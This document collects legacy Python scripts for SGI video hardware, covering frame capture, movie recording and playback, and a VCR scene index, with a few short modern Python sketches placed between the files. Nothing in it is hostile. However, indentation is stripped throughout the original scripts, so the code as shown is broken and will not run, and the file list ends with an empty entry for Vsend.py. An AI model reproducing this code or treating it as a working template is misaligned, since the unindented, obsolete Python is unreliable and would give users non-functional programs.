go = raw_input('Press return to capture ' + `queuesize` + ' frames: ')
result = v.CaptureBurst(svci)
svci, buffer, bitvec = result
## svci, buffer = result # XXX If bit vector not yet implemented
print 'Captured', svci[3], 'frames, i.e.', len(buffer)/1024, 'K bytes'
w, h = svci[1:3]
framesize = w * h
gl.prefposition(300, 300+w-1, 100, 100+h-1)
gl.foreground()
win = gl.winopen('Burst Capture')
gl.RGBmode()
gl.gconfig()
gl.qdevice(DEVICE.LEFTMOUSE)
gl.qdevice(DEVICE.ESCKEY)
print 'Click left mouse for next frame'
for i in range(svci[3]):
inverted_frame = sv.RGB8toRGB32(1, \
buffer[i*framesize:(i+1)*framesize], w, h)
gl.lrectwrite(0, 0, w-1, h-1, inverted_frame)
while 1:
dev, val = gl.qread()
if dev == DEVICE.LEFTMOUSE and val == 1:
break
if dev == DEVICE.REDRAW:
gl.lrectwrite(0, 0, w-1, h-1, inverted_frame)
if dev == DEVICE.ESCKEY:
v.CloseVideo()
gl.winclose(win)
return
v.CloseVideo()
gl.winclose(win)
main()
```
#### File: sgi/sv/rgbgrab.py
```python
import sys
import sv, SV
import gl, GL, DEVICE
import time
def main():
v = sv.OpenVideo()
# Determine maximum window size based on signal standard
param = [SV.BROADCAST, 0]
v.GetParam(param)
if param[1] == SV.PAL:
width = SV.PAL_XMAX
height = SV.PAL_YMAX
elif param[1] == SV.NTSC:
width = SV.NTSC_XMAX
height = SV.NTSC_YMAX
else:
print 'Unknown video standard', param[1]
sys.exit(1)
# Initially all windows are half size
grabwidth, grabheight = width/2, height/2
# Open still window
gl.foreground()
gl.prefsize(grabwidth, grabheight)
still_win = gl.winopen('Grabbed frame')
gl.keepaspect(width, height)
gl.maxsize(width, height)
gl.winconstraints()
gl.RGBmode()
gl.gconfig()
gl.clear()
gl.pixmode(GL.PM_SIZE, 8)
# Open live window
gl.foreground()
gl.prefsize(grabwidth, grabheight)
live_win = gl.winopen('Live video')
gl.keepaspect(width, height)
gl.maxsize(width, height)
gl.winconstraints()
# Bind live video
v.SetSize(gl.getsize())
v.BindGLWindow(live_win, SV.IN_REPLACE)
print 'Use leftmouse to grab frame'
gl.qdevice(DEVICE.LEFTMOUSE)
gl.qdevice(DEVICE.WINQUIT)
gl.qdevice(DEVICE.WINSHUT)
gl.qdevice(DEVICE.ESCKEY)
frame = None
while 1:
dev, val = gl.qread()
if dev == DEVICE.LEFTMOUSE and val == 0:
w, h, fields = v.CaptureOneFrame(SV.RGB8_FRAMES, \
grabwidth, grabheight)
frame = sv.InterleaveFields(1, fields, w, h)
gl.winset(still_win)
gl.lrectwrite(0, 0, w - 1, h - 1, frame)
gl.winset(live_win)
if dev in (DEVICE.ESCKEY, DEVICE.WINQUIT, DEVICE.WINSHUT):
v.CloseVideo()
gl.winclose(live_win)
gl.winclose(still_win)
break
if dev == DEVICE.REDRAW and val == still_win:
gl.winset(still_win)
gl.reshapeviewport()
gl.clear()
grabwidth, grabheight = gl.getsize()
if frame:
gl.lrectwrite(0, 0, w - 1, h - 1, frame)
gl.winset(live_win)
if dev == DEVICE.REDRAW and val == live_win:
v.SetSize(gl.getsize())
v.BindGLWindow(live_win, SV.IN_REPLACE)
main()
```
#### File: sgi/video/DisplayVideoIn.py
```python
import gl
import GL
# The live video input class.
# Only instantiate this if have_video is true!
class DisplayVideoIn:
# Initialize an instance. Arguments:
# vw, vh: size of the video window data to be captured.
# position defaults to 0, 0 but can be set later
def __init__(self, pktmax, vw, vh, type):
self.pktmax = pktmax
self.realwidth, self.realheight = vw, vh
if type <> 'rgb':
raise 'Incorrect video data type', type
self.type = type
self.width = vw
self.height = vh
#
# Open dummy window
#
gl.foreground()
gl.noport()
self.wid = gl.winopen('DisplayVideoIn')
self.x0 = 0
self.x1 = self.x0 + self.width - 1
self.y0 = 0
self.y1 = self.y0 + self.height - 1
# Compute # full lines per packet
self.lpp = pktmax / self.linewidth()
if self.lpp <= 0:
raise 'No lines in packet', self.linewidth()
self.pktsize = self.lpp*self.linewidth()
self.data = None
self.old_data = None
self.dataoffset = 0
self.lpos = 0
self.hints = 0
# Change the size of the video being displayed.
def resizevideo(self, vw, vh):
self.width = vw
self.height = vh
self.x1 = self.x0 + self.width - 1
self.y1 = self.y0 + self.height - 1
def positionvideo(self, x, y):
self.x0 = x
self.y0 = y
self.x1 = self.x0 + self.width - 1
self.y1 = self.y0 + self.height - 1
# Remove an instance.
# This turns off continuous capture.
def close(self):
gl.winclose(self.wid)
# Get the length in bytes of a video line
def linewidth(self):
return self.width*4
# Get the next video packet.
# This returns (lpos, data) where:
# - lpos is the line position
# - data is a piece of data
# The dimensions of data are:
# - pixel depth = 1 byte
# - scan line width = self.width (the vw argument to __init__())
# - number of scan lines = self.lpp (PKTMAX / vw)
def getnextpacket(self):
if not self.data or self.dataoffset >= len(self.data):
self.old_data = self.data
self.data = gl.readdisplay(self.x0, self.y0, \
self.x1, self.y1, self.hints)
self.dataoffset = 0
self.lpos = 0
data = self.data[self.dataoffset:self.dataoffset+self.pktsize]
while self.old_data and \
self.dataoffset+self.pktsize < len(self.data):
odata = self.old_data[self.dataoffset: \
self.dataoffset+self.pktsize]
if odata <> data:
break
print 'skip', self.lpos
self.lpos = self.lpos + self.lpp
self.dataoffset = self.dataoffset + self.pktsize
data = self.data[self.dataoffset:\
self.dataoffset+self.pktsize]
lpos = self.lpos
self.dataoffset = self.dataoffset + self.pktsize
self.lpos = self.lpos + self.lpp
return lpos, data
```
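A consumer of `getnextpacket()` has to place each packet at scan line `lpos` and keep the previous frame's contents for any runs the sender skipped. A hedged sketch of that reassembly (the helper is illustrative; 4 bytes per pixel matches `linewidth()` above):
```python
def reassemble(packets, width, height, previous=None, bytes_per_pixel=4):
    """Rebuild one frame from the (lpos, data) packets that
    DisplayVideoIn.getnextpacket() yields: lpos is the first scan line a
    packet covers, and runs identical to the previous frame are skipped."""
    linewidth = width * bytes_per_pixel
    frame = bytearray(previous or linewidth * height)  # seed with last frame
    for lpos, data in packets:
        start = lpos * linewidth
        frame[start:start + len(data)] = data
    return bytes(frame)

frame = reassemble([(0, b'\xff' * 16)], width=2, height=2)
```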
#### File: sgi/video/makemovie.py
```python
import sys
sys.path.append('/ufs/guido/src/video')
import sv, SV
import VFile
import gl, GL, DEVICE
import al, AL
import time
import posix
import getopt
import string
def main():
QSIZE = 16
TIME = 5
audio = 0
opts, args = getopt.getopt(sys.argv[1:], 'aq:t:')
for opt, arg in opts:
if opt == '-a':
audio = 1
elif opt == '-q':
QSIZE = string.atoi(arg)
elif opt == '-t':
TIME = string.atoi(arg)
if args:
filename = args[0]
else:
filename = 'film.video'
if audio:
if args[1:]:
audiofilename = args[1]
else:
audiofilename = 'film.aiff'
gl.foreground()
x, y = SV.PAL_XMAX / 4, SV.PAL_YMAX / 4
print x, 'x', y
gl.minsize(40, 30)
gl.stepunit(8, 6)
gl.maxsize(SV.PAL_XMAX, SV.PAL_YMAX)
gl.keepaspect(SV.PAL_XMAX, SV.PAL_YMAX)
win = gl.winopen(filename)
x, y = gl.getsize()
print x, 'x', y
v = sv.OpenVideo()
v.BindGLWindow(win, SV.IN_REPLACE)
v.SetSize(x, y)
v.BindGLWindow(win, SV.IN_REPLACE)
v.SetCaptureFormat(SV.RGB_FRAMES)
v.SetCaptureMode(SV.BLOCKING_CAPTURE)
v.SetQueueSize(QSIZE)
v.InitCapture()
if v.GetQueueSize() != QSIZE:
QSIZE = v.GetQueueSize()
print 'Warning: QSIZE reduced to', QSIZE
gl.qdevice(DEVICE.LEFTMOUSE)
gl.qdevice(DEVICE.WINQUIT)
gl.qdevice(DEVICE.WINSHUT)
gl.qdevice(DEVICE.ESCKEY)
print 'Click left mouse to start recording', TIME, 'seconds'
ofile = None
afile = None
# Mouse down opens the file & freezes window
# Mouse up starts recording frames
while 1:
dev, val = gl.qread()
if dev == DEVICE.LEFTMOUSE:
# Start recording
if val == 1:
# Mouse down -- preparations
if ofile == None:
ofile = VFile.VoutFile().init(filename)
ofile.format = 'rgb8'
ofile.width = x
ofile.height = y
ofile.writeheader()
# XXX other format bits?
# The window can't be resized from now
gl.prefsize(x, y)
gl.winconstraints()
gl.wintitle('* ' + filename)
if audio:
afile = initaudio(audiofilename)
continue
# Mouse up -- start actual recording
global recording, stop_recording
if audio:
stop_recording = 0
recording.release()
t0 = time.millitimer()
v.StartCapture()
while 1:
t = time.millitimer() - t0
if t >= TIME*1000:
break
if v.GetCaptured() > 2:
doframe(v, ofile, x, y, t)
v.StopCapture()
stop_recording = 1
while v.GetCaptured() > 0:
doframe(v, ofile, x, y, t)
t = time.millitimer() - t0
gl.wintitle(filename)
elif dev == DEVICE.REDRAW:
# Window resize (or move)
x, y = gl.getsize()
print x, 'x', y
v.SetSize(x, y)
v.BindGLWindow(win, SV.IN_REPLACE)
elif dev in (DEVICE.ESCKEY, DEVICE.WINQUIT, DEVICE.WINSHUT):
# Quit
if ofile:
ofile.close()
if afile:
afile.destroy()
posix._exit(0)
# EndCapture dumps core...
v.EndCapture()
v.CloseVideo()
gl.winclose(win)
def doframe(v, ofile, x, y, t):
cd, start = v.GetCaptureData()
data = cd.interleave(x, y)
cd.UnlockCaptureData()
ofile.writeframe(t, data, None)
AQSIZE = 16000
def initaudio(filename):
import thread, aiff
global recording, stop_recording
afile = aiff.Aiff().init(filename, 'w')
afile.nchannels = AL.MONO
afile.sampwidth = AL.SAMPLE_8
params = [AL.INPUT_RATE, 0]
al.getparams(AL.DEFAULT_DEVICE, params)
print 'rate =', params[1]
afile.samprate = params[1]
c = al.newconfig()
c.setchannels(AL.MONO)
c.setqueuesize(AQSIZE)
c.setwidth(AL.SAMPLE_8)
aport = al.openport(filename, 'r', c)
recording = thread.allocate_lock()
recording.acquire()
stop_recording = 0
thread.start_new_thread(recorder, (afile, aport))
return afile
def recorder(afile, aport):
# XXX recording more than one fragment doesn't work
# XXX (the thread never dies)
recording.acquire()
while not stop_recording:
data = aport.readsamps(AQSIZE/2)
afile.writesampsraw(data)
del data
main()
```
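The audio side of makemovie.py uses a lock as a start gate: the recorder thread blocks on `recording.acquire()` until the main thread releases it, and a shared flag stops it. A minimal sketch of the same handshake with the modern `threading` module (all names here are illustrative):
```python
import threading
import time

stop_recording = False
start_gate = threading.Lock()        # plays the role of the 'recording' lock
start_gate.acquire()                 # recorder will block until we release it

def recorder(chunks):
    start_gate.acquire()             # wait for the main thread's go signal
    while not stop_recording:
        time.sleep(0.01)             # stands in for aport.readsamps(...)
        chunks.append(b'audio')

chunks = []
threading.Thread(target=recorder, args=(chunks,), daemon=True).start()
start_gate.release()                 # start, mirroring recording.release()
time.sleep(0.1)                      # ... video capture happens here ...
stop_recording = True                # stop, as the StopCapture() path does
```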
#### File: sgi/video/VcrIndex.py
```python
import os
import string
error='VcrIndex.error'
VERSION_STRING='#!VcrIndex 1.1\n'
PREV_VERSION_STRING='#!VcrIndex 1.0\n'
class VcrIndex:
def __init__(self, name):
self.curmovie = None
self.curscene = None
self.modified = 0
self.filename = name
self.basename = os.path.basename(name)
self.editable = []
if not name:
self.movies = {}
return
try:
fp = open(name, 'r')
except IOError:
self.movies = {}
return
header = fp.readline()
if header == PREV_VERSION_STRING:
print 'Converting old-format database...'
data = fp.read(100000)
self.movies = eval(data)
for m in self.movies.keys():
d = self.movies[m]
newd = {}
for s in d.keys():
newsd = {}
newsd['START'] = d[s]
if s == 'START':
s = '-ALL-'
newd[s] = newsd
self.movies[m] = newd
print 'Done.'
return
if header <> VERSION_STRING:
print 'VcrIndex: incorrect version string:', header
self.movies = {}
return
data = fp.read(100000)
self.movies = eval(data)
#
# Save database to given file (or same file as read from if no
# filename given).
#
def save(self, name):
if not name:
name = self.filename
if not name:
raise error, 'No filename given'
self.filename = name
bupname = name + '~'
try:
os.unlink(bupname)
except os.error:
pass
try:
os.rename(name, bupname)
except os.error:
pass
fp = open(name, 'w')
data = str(self.movies)
fp.write(VERSION_STRING)
fp.write(data)
fp.write('\n')
fp.close()
self.modified = 0
#
# Get a list of movie names in tape order
#
def get_movienames(self):
names = self.movies.keys()
sorted = []
for name in names:
sorted.append((self.movies[name]['-ALL-']['START'], name))
sorted.sort()
rv = []
for pos, name in sorted:
rv.append(name)
return rv
#
# Get a list of scene names in tape order
#
def get_scenenames(self):
if not self.curmovie:
return []
scenedict = self.movies[self.curmovie]
names = scenedict.keys()
sorted = []
for name in names:
sorted.append((scenedict[name]['START'], name))
sorted.sort()
rv = []
for pos, name in sorted:
rv.append(name)
return rv
#
# Get a list of scene ids (format '00:02:32:12 name') in tape order
#
def get_sceneids(self):
if not self.curmovie:
return []
scenedict = self.movies[self.curmovie]
names = scenedict.keys()
sorted = []
for name in names:
sorted.append((scenedict[name]['START'], name))
sorted.sort()
rv = []
for pos, name in sorted:
str = '%02d:%02d:%02d:%02d ' % pos
rv.append(str + name)
return rv
#
# Does a movie exist?
#
def movie_exists(self, name):
return self.movies.has_key(name)
#
# Select a movie.
#
def movie_select(self, name):
if not self.movies.has_key(name):
raise error, 'No such movie: '+name
self.curmovie = name
self.curscene = None
#
# Get movie dictionary, or raise an error if no current movie.
#
def _getmoviedict(self):
if not self.curmovie:
raise error, 'No current movie'
return self.movies[self.curmovie]
#
# Rename a movie.
#
def movie_rename(self, newname):
scenedict = self._getmoviedict()
if self.movie_exists(newname):
raise error, 'Movie already exists: '+newname
del self.movies[self.curmovie]
self.movies[newname] = scenedict
self.curmovie = newname
self.modified = 1
#
# Copy a movie.
#
def movie_copy(self, newname):
scenedict = self._getmoviedict()
if self.movie_exists(newname):
raise error, 'Movie already exists: '+newname
newdict = {}
for k in scenedict.keys():
olddata = scenedict[k]
newdata = {}
for i in olddata.keys():
newdata[i] = olddata[i]
newdict[k] = newdata
self.movies[newname] = newdict
self.curmovie = newname
self.modified = 1
#
# Delete a movie.
#
def movie_delete(self):
if not self.curmovie:
raise error, 'No current movie'
del self.movies[self.curmovie]
self.curmovie = None
self.curscene = None
self.modified = 1
#
# Create a new movie.
#
def movie_new(self, name, pos):
if self.movie_exists(name):
raise error, 'Movie already exists: '+name
newdict = {}
newsdict = {}
newsdict['START'] = pos
newdict['-ALL-'] = newsdict
self.movies[name] = newdict
self.curmovie = name
self.curscene = None
self.modified = 1
#
# Does a scene exist?
#
def scene_exists(self, name):
scenedict = self._getmoviedict()
return scenedict.has_key(name)
#
# Select a current scene.
#
def scene_select(self, name):
scenedict = self._getmoviedict()
if not scenedict.has_key(name):
raise error, 'No such scene: '+name
self.curscene = name
#
# Rename a scene.
#
def scene_rename(self, newname):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
if scenedict.has_key(newname):
raise error, 'Scene already exists: '+newname
if self.curscene == '-ALL-':
raise error, 'Cannot rename -ALL-'
scenedict[newname] = scenedict[self.curscene]
del scenedict[self.curscene]
self.curscene = newname
self.modified = 1
#
# Copy a scene.
#
def scene_copy(self, newname):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
if scenedict.has_key(newname):
raise error, 'Scene already exists: '+newname
scenedict[newname] = scenedict[self.curscene]
self.curscene = newname
self.modified = 1
#
# Delete a scene.
#
def scene_delete(self):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
if self.curscene == '-ALL-':
raise error, 'Cannot delete -ALL-'
del scenedict[self.curscene]
self.curscene = None
self.modified = 1
#
# Add a new scene.
#
def scene_new(self, newname, pos):
scenedict = self._getmoviedict()
if scenedict.has_key(newname):
raise error, 'Scene already exists: '+newname
newdict = {}
newdict['START'] = pos
scenedict[newname] = newdict
self.curscene = newname
self.modified = 1
#
# Get scene data.
#
def _getscenedata(self):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
return scenedict[self.curscene]
#
# Data manipulation routines.
#
def pos_get(self):
return self._getscenedata()['START']
#
def pos_set(self, pos):
data = self._getscenedata()
data['START'] = pos
self.modified = 1
#
def comment_get(self):
data = self._getscenedata()
if data.has_key('COMMENT'):
return data['COMMENT']
else:
return ''
#
def comment_set(self, comment):
data = self._getscenedata()
data['COMMENT'] = comment
self.modified = 1
#
# Get the scene id of the current scene.
#
def get_cursceneid(self):
pos = self._getscenedata()['START']
str = '%02d:%02d:%02d:%02d ' % pos
return str + self.curscene
#
# Convert a scene id to a scene name.
#
def scene_id2name(self, id):
pos = string.find(id, ' ')
if pos <= 0:
raise error, 'Not a scene id: '+id
return id[pos+1:]
#
# Select a scene given a position.
#
def pos_select(self, pos):
prevmovie = None
movies = self.get_movienames()
for movie in movies:
mpos = self.movies[movie]['-ALL-']['START']
if mpos > pos:
break
prevmovie = movie
if not prevmovie:
raise error, 'Scene before BOT'
self.movie_select(prevmovie)
scenes = self.get_scenenames()
scenedict = self._getmoviedict()
prevscene = 'START'
for scene in scenes:
if scenedict[scene]['START'] > pos:
break
prevscene = scene
self.scene_select(prevscene)
```
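Scene ids are the string format `'HH:MM:SS:FF name'` built in `get_sceneids()` and split apart in `scene_id2name()`. A tiny round-trip sketch of that format:
```python
def make_scene_id(pos, name):
    """Format produced by get_sceneids()/get_cursceneid() above."""
    return '%02d:%02d:%02d:%02d ' % pos + name

def scene_id2name(scene_id):
    """Inverse, as in VcrIndex.scene_id2name: keep what follows the space."""
    i = scene_id.find(' ')
    if i <= 0:
        raise ValueError('not a scene id: ' + scene_id)
    return scene_id[i + 1:]

assert scene_id2name(make_scene_id((0, 2, 32, 12), 'intro')) == 'intro'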
#### File: sgi/video/VGrabber.py
```python
import gl, GL
import VFile
import GET
from VFile import Error
class VGrabber(VFile.VideoParams):
# XXX The constructor of VideoParams is just fine, for now
# Grab a frame.
# Return (data, chromdata) just like getnextframe().
def grabframe(self):
grabber = choose_grabber(self.format)
return grabber(self.width, self.height, self.packfactor)
# Choose one of the grabber functions below based upon a color system name
def choose_grabber(format):
try:
return eval('grab_' + format)
except:
raise Error, 'Unknown color system: ' + `format`
# Routines to grab data, per color system (only a few really supported).
# (These functions are used via eval with a constructed argument!)
def grab_rgb(w, h, pf):
if gl.getdisplaymode() <> GET.DMRGB:
raise Error, 'Sorry, can only grab rgb in single-buf rgbmode'
if pf <> (1, 1):
raise Error, 'Sorry, only grab rgb with packfactor (1,1)'
return gl.lrectread(0, 0, w-1, h-1), None
def grab_rgb8(w, h, pf):
if gl.getdisplaymode() <> GET.DMRGB:
raise Error, 'Sorry, can only grab rgb8 in single-buf rgbmode'
if pf <> (1, 1):
raise Error, 'Sorry, can only grab rgb8 with packfactor (1,1)'
if not VFile.is_entry_indigo():
raise Error, 'Sorry, can only grab rgb8 on entry level Indigo'
# XXX Dirty Dirty here.
# XXX Set buffer to cmap mode, grab image and set it back.
gl.cmode()
gl.gconfig()
gl.pixmode(GL.PM_SIZE, 8)
data = gl.lrectread(0, 0, w-1, h-1)
data = data[:w*h] # BUG FIX for python lrectread
gl.RGBmode()
gl.gconfig()
gl.pixmode(GL.PM_SIZE, 32)
return data, None
def grab_grey(w, h, pf):
raise Error, 'Sorry, grabbing grey not implemented'
def grab_yiq(w, h, pf):
raise Error, 'Sorry, grabbing yiq not implemented'
def grab_hls(w, h, pf):
raise Error, 'Sorry, grabbing hls not implemented'
def grab_hsv(w, h, pf):
raise Error, 'Sorry, grabbing hsv not implemented'
def grab_jpeg(w, h, pf):
data, dummy = grab_rgb(w, h, pf)
import jpeg
data = jpeg.compress(data, w, h, 4)
return data, None
def grab_jpeggrey(w, h, pf):
raise Error, 'sorry, grabbing jpeggrey not implemented'
```
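`choose_grabber()` builds a function name and `eval()`s it, as its comment warns. A dictionary dispatch gives the same routing without `eval`; this sketch shows the technique in isolation (toy grabber entry, not the VGrabber API):
```python
def make_chooser(grabbers):
    """Dispatch-table alternative to the eval() lookup in choose_grabber().
    grabbers maps a color-system name to its grab function."""
    def choose(format):
        try:
            return grabbers[format]
        except KeyError:
            raise ValueError('Unknown color system: %r' % (format,))
    return choose

choose = make_chooser({'rgb': lambda w, h, pf: ((), None)})  # toy entry
assert choose('rgb')(4, 4, (1, 1)) == ((), None)
```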
#### File: sgi/video/vinfo.py
```python
from gl import *
from GL import *
from DEVICE import *
import time
import sys
import getopt
class Struct: pass
epoch = Struct()
EndOfFile = 'End of file'
bye = 'bye'
def openvideo(filename):
f = open(filename, 'r')
line = f.readline()
if not line: raise EndOfFile
if line[:4] == 'CMIF': line = f.readline()
x = eval(line[:-1])
if len(x) == 3: w, h, pf = x
else: w, h = x; pf = 2
return f, w, h, pf
def loadframe(f, w, h, pf):
line = f.readline()
if line == '':
raise EndOfFile
x = eval(line[:-1])
if type(x) == type(0) or type(x) == type(0.0):
tijd = x
if pf == 0:
size = w*h*4
else:
size = (w/pf) * (h/pf)
else:
tijd, size = x
f.seek(size, 1)
return tijd
def main():
delta = 0
short = 0
try:
opts, names = getopt.getopt(sys.argv[1:], 'ds')
except getopt.error, msg:
sys.stderr.write(msg + '\n')
sys.stderr.write('usage: vinfo [-d] [-s] [file] ...\n')
sys.exit(2)
for opt, arg in opts:
if opt == '-d': delta = 1 # print delta between frames
elif opt == '-s': short = 1 # short: don't print times
if names == []:
names = ['film.video']
for name in names:
try:
f, w, h, pf = openvideo(name)
except:
sys.stderr.write(name + ': cannot open\n')
continue
if pf == 0:
size = w*h*4
else:
size = (w/pf) * (h/pf)
print name, ':', w, 'x', h, '; pf =', pf, ', size =', size,
if pf == 0:
print '(color)',
else:
print '(' + `(w/pf)` + 'x' + `(h/pf)` + ')',
if (w/pf)%4 <> 0: print '!!!',
print
num = 0
try:
otijd = 0
while not short:
try:
tijd = loadframe(f, w, h, pf)
if delta: print '\t' + `tijd-otijd`,
else: print '\t' + `tijd`,
otijd = tijd
num = num + 1
if num % 8 == 0:
print
except EndOfFile:
raise bye
except bye:
pass
if num % 8 <> 0:
print
f.close()
main()
```
#### File: sgi/video/Vplay.py
```python
def help():
print 'Usage: Vplay [options] [file] ...'
print
print 'Options:'
print '-M magnify : magnify the image by the given factor'
print '-d : write some debug stuff on stderr'
print '-l : loop, playing the movie over and over again'
print '-m delta : drop frames closer than delta seconds (default 0.)'
print '-n : don\'t wait after each file'
print '-q : quiet, no informative messages'
print '-r delta : regenerate input time base delta seconds apart'
print '-s speed : speed change factor (default 1.0)'
print '-t : use a 2nd thread for read-ahead'
print '-x left : window offset from left of screen'
print '-y top : window offset from top of screen'
print '-w width : window width'
print '-h height : window height'
print '-b color : background color (white,black or (r,g,b))'
print 'file ... : file(s) to play; default film.video'
print
print 'User interface:'
print 'Press the left mouse button to stop or restart the movie.'
print 'Press ESC or use the window manager Close or Quit command'
print 'to close the window and play the next file (if any).'
# Imported modules
import sys
sys.path.append('/ufs/guido/src/video') # Increase chance of finding VFile
import VFile
import time
import gl, GL
from DEVICE import REDRAW, ESCKEY, LEFTMOUSE, WINSHUT, WINQUIT
import getopt
import string
# Global options
debug = 0
looping = 0
magnify = 1
mindelta = 0
nowait = 0
quiet = 0
regen = None
speed = 1.0
threading = 0
xoff = yoff = None
xwsiz = ywsiz = None
bgcolor = None
# Main program -- mostly command line parsing
def main():
global debug, looping, magnify, mindelta, nowait, quiet, regen, speed
global threading, xoff, yoff, xwsiz, ywsiz, bgcolor
# Parse command line
try:
opts, args = getopt.getopt(sys.argv[1:], \
'M:dlm:nqr:s:tx:y:w:h:b:')
except getopt.error, msg:
sys.stdout = sys.stderr
print 'Error:', msg, '\n'
help()
sys.exit(2)
# Interpret options
try:
for opt, arg in opts:
if opt == '-M': magnify = float(eval(arg))
if opt == '-d': debug = debug + 1
if opt == '-l': looping = 1
if opt == '-m': mindelta = float(eval(arg))
if opt == '-n': nowait = 1
if opt == '-q': quiet = 1
if opt == '-r': regen = float(eval(arg))
if opt == '-s':
try:
speed = float(eval(arg))
except:
sys.stdout = sys.stderr
print 'Option -s needs float argument'
sys.exit(2)
if opt == '-t':
try:
import thread
threading = 1
except ImportError:
print 'Sorry, this version of Python',
print 'does not support threads:',
print '-t ignored'
if opt == '-x': xoff = string.atoi(arg)
if opt == '-y': yoff = string.atoi(arg)
if opt == '-w': xwsiz = string.atoi(arg)
if opt == '-h': ywsiz = string.atoi(arg)
if opt == '-b':
if arg == 'black':
bgcolor = (0,0,0)
elif arg == 'white':
bgcolor = (255,255,255)
else:
try:
bgcolor = eval(arg)
xxr, xxg, xxb = bgcolor
except:
print '-b needs (r,g,b) tuple'
sys.exit(2)
except string.atoi_error:
sys.stdout = sys.stderr
print 'Option', opt, 'requires integer argument'
sys.exit(2)
# Check validity of certain options combinations
if nowait and looping:
print 'Warning: -n and -l are mutually exclusive; -n ignored'
nowait = 0
if xoff <> None and yoff == None:
print 'Warning: -x without -y ignored'
if xoff == None and yoff <> None:
print 'Warning: -y without -x ignored'
# Process all files
if not args: args = ['film.video']
sts = 0
for filename in args:
sts = (process(filename) or sts)
# Exit with proper exit status
sys.exit(sts)
# Process one movie file
def process(filename):
try:
vin = VFile.VinFile(filename)
except IOError, msg:
sys.stderr.write(filename + ': I/O error: ' + `msg` + '\n')
return 1
except VFile.Error, msg:
sys.stderr.write(msg + '\n')
return 1
except EOFError:
sys.stderr.write(filename + ': EOF in video header\n')
return 1
if not quiet:
vin.printinfo()
gl.foreground()
width, height = int(vin.width * magnify), int(vin.height * magnify)
xborder = yborder = 0
if xwsiz:
vin.xorigin = (xwsiz - width)/2
width = xwsiz
if ywsiz:
vin.yorigin = (ywsiz - height)/2
height = ywsiz
if xoff <> None and yoff <> None:
scrheight = gl.getgdesc(GL.GD_YPMAX)
gl.prefposition(xoff, xoff+width-1, \
scrheight-yoff-height, scrheight-yoff-1)
else:
gl.prefsize(width, height)
win = gl.winopen(filename)
gl.clear()
if quiet: vin.quiet = 1
vin.initcolormap()
if bgcolor:
r, g, b = bgcolor
vin.clearto(r,g,b)
gl.qdevice(ESCKEY)
gl.qdevice(WINSHUT)
gl.qdevice(WINQUIT)
gl.qdevice(LEFTMOUSE)
stop = 0
while not stop:
gl.wintitle(filename)
stop = (playonce(vin) or nowait)
gl.wintitle('(done) ' + filename)
if not looping:
while not stop:
dev, val = gl.qread()
if dev == REDRAW:
if bgcolor:
r,g,b = bgcolor
vin.clearto(r,g,b)
else:
vin.clear()
if dev == LEFTMOUSE and val == 1:
break # Continue outer loop
if dev == ESCKEY and val == 1 or \
dev in (WINSHUT, WINQUIT):
stop = 1
# Set xoff, yoff for the next window from the current window
global xoff, yoff
xoff, yoff = gl.getorigin()
width, height = gl.getsize()
scrheight = gl.getgdesc(GL.GD_YPMAX)
yoff = scrheight - yoff - height
gl.winclose(win)
return 0
# Play a movie once; return 1 if user wants to stop, 0 if not
def playonce(vin):
vin.rewind()
vin.colormapinited = 1
vin.magnify = magnify
if threading:
MAXSIZE = 20 # Don't read ahead too much
import thread
import Queue
queue = Queue.Queue(MAXSIZE)
stop = []
thread.start_new_thread(read_ahead, (vin, queue, stop))
# Get the read-ahead thread going
while queue.qsize() < MAXSIZE/2 and not stop:
time.sleep(0.100)
tin = 0
toffset = 0
oldtin = 0
told = 0
nin = 0
nout = 0
nlate = 0
nskipped = 0
data = None
tlast = t0 = time.time()
while 1:
if gl.qtest():
dev, val = gl.qread()
if dev == ESCKEY and val == 1 or \
dev in (WINSHUT, WINQUIT) or \
dev == LEFTMOUSE and val == 1:
if debug: sys.stderr.write('\n')
if threading:
stop.append(None)
while 1:
item = queue.get()
if item == None: break
return (dev != LEFTMOUSE)
if dev == REDRAW:
gl.reshapeviewport()
if data: vin.showframe(data, cdata)
if threading:
if debug and queue.empty(): sys.stderr.write('.')
item = queue.get()
if item == None: break
tin, data, cdata = item
else:
try:
tin, size, csize = vin.getnextframeheader()
except EOFError:
break
tin = tin*0.001
nin = nin+1
if tin+toffset < oldtin:
print 'Fix reversed time:', oldtin, 'to', tin
toffset = oldtin - tin
tin = tin + toffset
oldtin = tin
if regen: tout = nin * regen
else: tout = tin
tout = tout / speed
if tout - told < mindelta:
nskipped = nskipped + 1
if not threading:
vin.skipnextframedata(size, csize)
else:
if not threading:
try:
data, cdata = \
vin.getnextframedata(size, csize)
except EOFError:
if not quiet:
print '[incomplete last frame]'
break
now = time.time()
dt = (tout-told) - (now-tlast)
told = tout
if debug: sys.stderr.write(`round(dt, 3)` + ' ')
if dt < 0: nlate = nlate + 1
if dt > 0:
time.sleep(dt)
now = time.time()
tlast = now
vin.showframe(data, cdata)
nout = nout + 1
t1 = time.time()
if debug: sys.stderr.write('\n')
if quiet: return 0
print 'Recorded:', nin, 'frames in', round(tin, 3), 'sec.',
if tin: print '-- average', round(nin/tin, 1), 'frames/sec',
print
if nskipped: print 'Skipped', nskipped, 'frames'
tout = t1-t0
print 'Played:', nout,
print 'frames in', round(tout, 3), 'sec.',
if tout: print '-- average', round(nout/tout, 1), 'frames/sec',
print
if nlate: print 'There were', nlate, 'late frames'
return 0
# Read-ahead thread
def read_ahead(vin, queue, stop):
try:
while not stop: queue.put(vin.getnextframe())
except EOFError:
pass
queue.put(None)
stop.append(None)
# Don't forget to call the main program
try:
main()
except KeyboardInterrupt:
print '[Interrupt]'
```
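The heart of `playonce()` is its pacing rule: sleep for the input-time gap minus the wall-clock time already spent, and drop frames spaced closer than `mindelta`. A self-contained sketch of just that loop (the generator form is illustrative):
```python
import time

def pace(frames, speed=1.0, mindelta=0.0):
    """Replay (t_seconds, payload) pairs in real time the way playonce()
    does: sleep for the input-time gap minus the wall-clock time already
    spent, and drop frames spaced closer than mindelta."""
    told = 0.0
    tlast = time.time()
    for tin, payload in frames:
        tout = tin / speed
        if tout - told < mindelta:
            continue                      # counted as skipped in playonce()
        dt = (tout - told) - (time.time() - tlast)
        told = tout
        if dt > 0:
            time.sleep(dt)
        tlast = time.time()
        yield payload                     # the caller shows the frame here

# list(pace([(0.0, 'f0'), (0.04, 'f1')])) plays two frames 40 ms apart
```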
#### File: sgi/video/Vsend.py
